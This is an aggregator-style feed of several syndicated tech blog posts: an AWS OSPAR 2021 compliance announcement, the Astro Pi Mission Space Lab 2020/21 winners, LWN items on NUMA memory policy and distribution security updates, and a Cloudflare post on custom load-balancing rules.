OSPAR 2021 report now available with 127 services in scope

Post Syndicated from Clara Lim original https://aws.amazon.com/blogs/security/ospar-2021-report-now-available-with-127-services-in-scope/

We are excited to announce the completion of the third Outsourced Service Provider Audit Report (OSPAR) audit cycle on July 1, 2021. The latest OSPAR certification includes the addition of 19 new services in scope, bringing the total number of services to 127 in the Asia Pacific (Singapore) Region.

You can download our latest OSPAR report in AWS Artifact, a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact. The list of services in scope for OSPAR is available in the report, and is also available on the AWS Services in Scope by Compliance Program webpage.

Some of the newly added services in scope include the following:

  • AWS Outposts, a fully managed service that extends AWS infrastructure, AWS services, APIs, and tools to any datacenter, co-location space, or an on-premises facility for a consistent hybrid experience.
  • Amazon Connect, an easy to use omnichannel cloud contact center that helps customers provide superior customer service across voice, chat, and tasks at lower cost than traditional contact center systems.
  • Amazon Lex, a service for building conversational interfaces into any application using voice and text.
  • Amazon Macie, a fully managed data security and data privacy service that uses machine learning and pattern matching to help customers discover, monitor, and protect customers’ sensitive data in AWS.
  • Amazon Quantum Ledger Database (QLDB), a fully managed ledger database that provides a transparent, immutable and cryptographically verifiable transaction log owned by a central trusted authority.

The OSPAR assessment is performed by an independent third-party auditor, selected from the ABS list of approved auditors. The assessment demonstrates that AWS has a system of controls in place that meets the Association of Banks in Singapore (ABS) Guidelines on Control Objectives and Procedures for Outsourced Service Providers. Our alignment with the ABS guidelines demonstrates to customers our commitment to meet the security expectations for cloud service providers set by the financial services industry in Singapore. You can leverage the OSPAR assessment report to conduct due diligence, and to help reduce the effort and costs required for compliance. The AWS OSPAR reporting period is now updated in the ABS list of OSPAR Audited Outsourced Service Providers.

As always, we are committed to bringing new services into the scope of our OSPAR program based on your architectural and regulatory needs. Please reach out to your AWS account team if you have questions about the OSPAR report.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Clara Lim

Clara is the Audit Program Manager for the Asia Pacific Region, leading multiple security certification programs. Clara is passionate about leveraging her decade-long experience to deliver compliance programs that provide assurance and build trust with customers.

Amazing science from the winners of Astro Pi Mission Space Lab 2020/21

Post Syndicated from Claire Given original https://www.raspberrypi.org/blog/winners-astro-pi-mission-space-lab-20-21/

The Raspberry Pi Foundation and ESA Education are excited to announce the winners and highly commended Mission Space Lab teams of the 2020/21 European Astro Pi Challenge!

ESA Astronaut Thomas Pesquet floating aboard the International Space Station with the two Astro Pi computers

In Mission Space Lab, teams of young people aged up to 19 create scientific experiments that run on the International Space Station’s two Astro Pi computers — space-hardened Raspberry Pis with cameras and an array of sensors.

In the final phase of Mission Space Lab, teams analyse the data captured during their experiment’s three-hour runtime on the ISS and write a short report describing their experiment’s hypothesis, methods, results, and conclusions.

The Maldives as captured by the Mechabot team

You can read the best reports below! From 154 final reports, the Astro Pi team has now chosen 10 winners and 5 highly commended teams that have each demonstrated great scientific merit and innovative use of the Astro Pi hardware.

Our winning teams are…

Zeus from Tudor Vianu National College of Computer Science in Romania, who used photos of Earth captured by the Astro Pi’s camera, historical data sets, and machine learning to develop a weather forecast system that predicts meteorological phenomena on Earth.

Mag-AZ from Escola Secundária Domingos Rebelo in Portugal, who attempted to create an algorithm that could calculate the location of the magnetic poles of any planet or star by using the Astro Pi’s sensors to map Earth’s magnetic fields.

Lake Balkhash in Kazakhstan as captured by the Jupiter team

Atlantes from Niubit Coding Club in Spain, who used a sonification process to convert data captured by the Astro Pi’s sensors into music, inspired by Commander Chris Hadfield’s performance of Space Oddity on the ISS in 2013. You can see more about their experiment here.

Mateii from Saint Sava National College in Romania, who investigated the potential growth of Aspergillus and Penicillium mold on the ISS in comparison to on Earth using a simulation model and Astro Pi sensor readings taken inside the Columbus module.

The river Nile in Egypt as captured by the Mechabot team

Juno from Institut d’Altafulla in Spain, who attempted to determine how much heat the astronauts aboard the ISS experience by using temperature, pressure, and humidity data captured by the Astro Pi’s sensors together with psychrometric calculations.

Albedo from Lycée Albert Camus in France, who investigated albedo on Earth, using photos captured by the Astro Pi’s camera to classify cloud, land, and sea coverage, and analysing their corresponding albedo values.

The river Nile in Sudan as captured by the Spacepi2 team

SpaceRad from Centrum Nauki Keplera – Planetarium Wenus in Poland, who also investigated albedo (the proportion of light or radiation that is reflected by a surface) on Earth to evaluate the efficacy of using solar farms to combat climate change.

Magtrix from The Leys School in the United Kingdom, who analysed whether geographical features of Earth such as mountains affect the planet’s magnetic field using the Astro Pi’s magnetometer, GPS data, and photos of Earth captured by the Astro Pi’s camera.

Newfoundland and Labrador as captured by the SpaceRad team

Mechabot from Robone Robotics Club in Germany, who investigated how the Earth’s magnetic field correlates with its climate, and how this affects near-Earth objects’ behaviour in low-Earth orbit.

Spacepi2 from Zanneio Model High School in Greece, who investigated urbanisation on Earth by comparing photos captured by the Astro Pi’s camera with historical data using an automated photo classification program they created and NDVI analysis.

Sakhalin Oblast in Russia as captured by the Liontech team

Highly commended teams

Bergson from Lycée Henri-Bergson Paris in France, who built an AI model predicting nitrogen dioxide pollution levels on Earth using NDVI analysis of photos taken by the Astro Pi’s camera.

The Tiwi Islands off the coast of Northern Australia as captured by the Magtrix team

LionTech from Mihai Eminescu National College, Oradea in Romania, who attempted to measure the velocity of the ISS in orbit, and also created an algorithm to detect smoke, pollution, and types of cloud coverage in the images they captured using the Astro Pi’s camera.

RosSpace from Ceo Boecillo in Spain, who are the third team in our list to have investigated Earth’s albedo levels in relation to global warming using photo analysis. A popular theme this year!

The Amur River and the Sea of Okhotsk (right) in Eastern Russia as captured by the Zeus team

Jupiter from Institut d’Altafulla in Spain, who looked at variations in the current surface area of water bodies on Earth compared to historical records as an indicator of climate change.

And a special mention for:

Ultrafly from Ultrafly Coding Club in Canada, who were the youngest team to make the highly commended list this year, with an average age of 8! Their experiment explored whether the environmental variables on the ISS created allergy-friendly living conditions for the astronauts on board.

The prize? A special webinar with ESA Astronaut Luca Parmitano

Every Astro Pi team that reached Phase 2 of Mission Space Lab by having their experiment idea accepted this year will receive participation certificates recognising their achievement, and the winners and highly commended teams will receive special certificates and an additional prize.

The prize for this year’s winners and highly commended teams is the chance to pose their questions to ESA astronaut Luca Parmitano during a webinar in September! We’ll shortly email the teams’ mentors the instructions for submitting their teams’ questions to Luca.

ESA Astronaut Luca Parmitano floating aboard the ISS with the two Astro Pi computers

This Q&A event for the finalists will conclude this year’s European Astro Pi Challenge. It’s been an incredible year for the Challenge, with 15,756 young people from 23 countries participating in Mission Zero or Mission Space Lab.

Everyone on the Raspberry Pi and ESA Education teams congratulates this year’s participants for their efforts, especially given the obstacles many teams had to overcome due to the coronavirus pandemic.

Thank you and congratulations to everyone who has taken part — we hope you found it as fun and inspiring as we did!

We can’t wait to welcome you back for the next European Astro Pi Challenge!

While this year’s Challenge is coming to an end, the European Astro Pi Challenge will return with both Mission Zero and Mission Space Lab in September!


We invite all teachers, educators, club leaders, and young people who love coding and space science to follow our updates on astro-pi.org and the Astro Pi Twitter account to make sure you don’t miss any announcements.


[$] NUMA policy and memory types

Post Syndicated from original https://lwn.net/Articles/862707/rss

Non-uniform memory access (NUMA) systems have an architecture that attaches memory to “nodes” within the system. CPUs, too, belong to nodes; memory that is attached to the same node as a CPU will be faster to access (from that CPU) than memory on other nodes. This aspect of performance has important implications for programs running on NUMA systems, and the kernel offers a number of ways for user space to optimize their behavior. The NUMA abstraction is now being extended, though, and that is driving a need for new ways of influencing memory allocation; the multi-preference memory policy patch set is an attempt to meet that need.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/863180/rss

Security updates have been issued by CentOS (firefox), Debian (firefox-esr), Fedora (linuxptp), Gentoo (commons-collections), Mageia (aom, firefox, python-django, thunderbird, and tpm2-tools), openSUSE (claws-mail, kernel, nodejs10, and nodejs14), Red Hat (nettle), Scientific Linux (firefox), SUSE (firefox, kernel, nodejs10, and nodejs14), and Ubuntu (libslirp and qemu).

Rich, complex rules for advanced load balancing

Post Syndicated from Brian Batraski original https://blog.cloudflare.com/rich-complex-rules-for-advanced-load-balancing/

Load Balancing — functionality that’s been around for the last 30 years to help businesses leverage their existing infrastructure resources. Load balancing works by proactively steering traffic away from unhealthy origin servers and — for more advanced solutions — intelligently distributing traffic load based on different steering algorithms. This process ensures that errors aren’t served to end users and empowers businesses to tightly couple overall business objectives to their traffic behavior.

What’s important for load balancing today?

We are no longer in the age where setting up a fixed number of servers in a data center is enough to meet the massive growth of users browsing the Internet. This means that we are well past the time when a one-size-fits-all solution could meet the needs of different businesses. Today, customers look for load balancers that are easy to use, propagate changes quickly, and — especially now — provide the most feature flexibility. Feature flexibility has become so important because different businesses have different paths to success and, consequently, different challenges! Let’s go through a few common use cases:

  • You might have an application split into microservices, where specific origins support segments of your application. You need to route your traffic based on specific paths to ensure no single origin can be overwhelmed and users get sent to the correct server to answer the originating request.
  • You may want to route traffic based on a specific value within a header request such as “PS5” and send requests to the data center with the matching header.
  • If you heavily prioritize security and privacy, you may adopt a split-horizon DNS setup within your network architecture. You might choose this architecture to separate internal network requests from public requests from the rest of the public Internet. Then, you could route each type of request to pools specifically suited to handle the amount and type of traffic.

As we continue to build new features and products, we also wanted to build a framework that would allow us to increase our velocity in adding new items to our Load Balancing solution while still taking the time to create first-class features. The result was the creation of our custom rule builder!

Now you can build complex, custom rules to direct traffic using Cloudflare Load Balancing, empowering customers to create their own custom logic around their traffic steering and origin selection decisions. As we mentioned, there is no one size fits all solution in today’s world. We provide the tools to easily and quickly create rules that meet the exact requirements needed for any customer’s unique situation and architecture. On top of that, we also support ‘and’ and ‘or’ statements within a rule, allowing very powerful and complex rules to be created for any situation!

Load Balancing by path becomes easy, requiring just a few minutes to enter the paths and some boolean statements to create complex rules. Steer by a specific header, query string, or cookie. It’s no longer a pain point. Leverage a split horizon DNS design by creating a rule looking at the IP source address and then routing to the appropriate pool based on the value. This is just a small subset of the very robust capabilities that load balancing custom rules makes available to our users and this is just the start! Not only do we have a large amount of functionality right out of the box, but we’re also providing a consistent, intuitive experience by building on our Firewall Rules Engine.

Let’s go through some use cases to explore how custom rules can open new possibilities by giving you more granular control of your traffic.

High-volume transactions for ecommerce

For any high-volume transaction business such as an ecommerce or retail store, ensuring the transactions go through as fast and reliably as possible is a table stakes requirement. As transaction volume increases, no single origin can handle the incoming traffic, and it doesn’t always make sense for it to do so. Why have a transaction request travel around the world to a specifically nominated origin for payment processing? This setup would only add latency, leading to degraded performance, increased errors, and a poor customer experience. But what if you could create custom logic to segment transactions to different origin servers based on a specific value in a query string, such as a PS5 (associated with Sony’s popular PlayStation 5)? What if you could then couple that value with dynamic latency steering to ensure your load balancer always chooses the most performant path to the origin? This would be game changing to not only ensure that table-stakes transactions are reliable and fast but also drastically improve the customer experience. You could do this in minutes with load balancing custom rules:

For any request where the query string contains ‘PS5’, route based on which pool is the most performant.

Load balance across multiple DNS vendors to support privacy and security

Some customers may want to use multiple DNS providers to bolster their resiliency along with their security and privacy for the different types of traffic going through their network. By utilizing two DNS providers, customers can not only be sure that they remain highly available in times of outages, but also direct different types of traffic, whether that be internal network traffic across offices or unknown traffic from the public Internet.

Without flexibility, however, it can be difficult to easily and intelligently route traffic to the proper data centers to maintain that security and privacy posture. Not anymore! With load balancing custom rules, supporting a split horizon DNS architecture takes as little as five minutes to set up a rule based on the IP source condition and then overwriting which pools or data centers that traffic should route to.

This can also be extremely helpful if your data centers are spread across multiple areas of the globe that don’t align with the 13 current regions within Cloudflare. By segmenting where traffic goes based on the IP source address, you can create a type of geo-steering setup that is also finely tuned to the requirements of the business!

How did we build it?

We built Load Balancing rules on top of our open-source wirefilter execution engine. People familiar with Firewall Rules and other products will notice similar syntax since both products are built on top of this execution engine.

By reusing the same underlying engine, we can take advantage of a battle-tested production library used by other products that have the performance and stability requirements of their own. For those experienced with our rule-based products, you can reuse your knowledge due to the shared syntax to define conditionals statements. For new users, the Wireshark-like syntax is often familiar and relatively simple.

DNS vs Proxied?

Our Load Balancer supports both DNS and Proxied load balancing. These two protocols operate very differently and as such are handled differently.

For DNS-based load balancing, our load balancer responds to DNS queries sent from recursive resolvers. These resolvers are normally not the end user directly requesting the traffic, nor is there a 1-to-1 ratio between DNS queries and end-user requests. The DNS makes extensive use of caching at all levels, so the result of each query could potentially be used by thousands of users. Combined, this greatly limits the possible feature set for DNS. Since you don’t see the end user directly, nor know if your response is going to be used by one or more users, all responses can only be customized to a limited degree.

Our Proxied load balancing, on the other hand, processes rules logic for every request going through the system. Since we act as a proxy for all these requests, we can invoke this logic for all requests and access user-specific data.

These different modes mean the fields available to each end up being quite different. The DNS load balancer gets access to DNS-specific fields such as “dns.qry.name” (the query name) while our Proxied load balancer has access to “http.request.method” (the HTTP method used to access the proxied resource). Some more general fields — like the name of the load balancer being used — are available in both modes.

How does it work under the hood?

When a load balancer rule is configured, that API call will validate that the conditions and actions of the rules are valid. It makes sure the condition only references known fields, isn’t excessively long, and is syntactically valid. The overrides are processed and applied to the load balancers configuration to make sure they won’t cause an invalid configuration. After validation, the new rule is saved to our database.

With the new rule saved, we take the load balancer’s data and all rules used by it and package that data together into one configuration to be shipped out to our edge. This process happens very quickly, so any changes are visible to you in just a few seconds.

While DNS and proxied load balancers have access to different fields and the protocols themselves are quite different, the two code paths overlap quite a bit. When either request type makes it to our load balancer, we first load up the load balancer specific configuration data from our edge datastore. This object contains all the “static” data for a load balancer, such as rules, origins, pools, steering policy, and so forth. We load dynamic data such as origin health and RTT data when evaluating each pool.

At the start of the load balancer processing, we run our rules. This ends up looking very much like a loop where we check each condition and — if the condition is true — we apply the effects specified by the rules. After each condition is processed and the effects are applied, we then run our normal load balancing logic as if you had configured the load balancer with the overridden settings. This style of applying each override in turn allows more than one rule to change a given setting multiple times during execution. This lets users avoid extremely long and specific conditionals and instead use shorter conditionals and rule ordering to override specific settings, creating a more modular ruleset.

What’s coming next?

For you, the next steps are simple. Start building custom load balancing rules! For more guidance, check out our developer documentation.

For us, we’re looking to expand this functionality. As this new feature develops, we are going to be identifying new fields for conditionals and new options for overrides to allow more specific behavior. As an example, we’ve been looking into exposing a means to creating more time-based conditionals, so users can create rules that only apply during certain times of the day or month. Stay tuned to the blog for more!
